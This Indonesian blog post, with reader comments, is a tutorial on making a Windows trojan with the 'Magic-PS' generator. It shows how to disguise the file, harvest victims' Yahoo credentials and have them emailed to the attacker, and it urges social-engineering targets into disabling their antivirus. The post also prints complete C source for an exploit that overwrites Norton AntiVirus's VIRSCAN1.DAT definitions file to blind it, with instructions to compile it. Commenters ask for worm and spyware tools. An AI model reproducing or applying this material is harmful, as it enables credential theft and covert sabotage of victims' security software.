Awas Trojan Mau Jadi Maling

Bagaimana caranya?

Persiapan :
[-] Magic-PS Trojan Generator. Bisa Anda download disini : http://lirva32.org/download/Magic-PS-15se++.zip
[-] File Binder. Anda bisa memanfaatkan file binder apapun.
[-] C Compiler


Target Trojan :
[-] User yang mempergunakan windows (– yg pake linux aman bro😉
[-] User yang masih bisa kena ‘social engineering’ (bro.. terserah gimana caranya deh.. biar tuh user bisa mati’in Antivirusnya….)
Kalo dia ga mau mati’in ya udah nanti kita matikan secara paksa dengan coding tertentu… ingat jangan maen clurit ya?😉 ).



Pembuatan Trojan :
[-] Matikan semua Antivirus yang berada di komputer Anda (–hhikkzzz.. kalo ga dimatikan bakalan ga’ bisa bikin trojan).
[-] Buatlah sebuah folder untuk menempatkan hasil trojan.
[-] Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.

Nanti tampilannya seperti ini :

Keterangan Trojan :

[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file ‘regsvr.exe’. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai “@yahoo.com”. Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh…)

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita😉
jangan sekali2 mengeksekusi file ini di komputer milik pribadi….😉

[06] Create MPS merupakan tombol yang men-generate trojan.

Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa.

//— code —-//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include <windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\”,0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,”CommonFilesDir”,0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,”\\Symantec Shared\\virusdefs\\”);
strcpy(fName,buff);
strcat(buff,”definfo.dat”);
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString(“DefDates”,”CurDefs”,””,dirName,sizeof(dirName),buff);
if(!strcmp(dirName,””))
return 1;
strcat(fName,dirName);
strcat(fName,”\\VIRSCAN1.DAT”);
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);

if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.

//— code —-//

Artikel ini saya chomod dari lirva32 thanks ya

2 Tanggapan

  1. boss….jelasin dong langkah detailnya….gak mudeng aku?
    yang rinci dan juelas….orang goblok nih soalnya..thank.kirim ke emailku

  2. mas yang sguh sangata ganteng… tolong aku nahh… kirimkan aku software bikin program worm,trojan,spyware dan hantu2 sejenisnya.. emailku yos_law666@yahoo.co.id
    kalo blum puas ke FB ku.. Yosafat Vietnam.. ok bosss…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: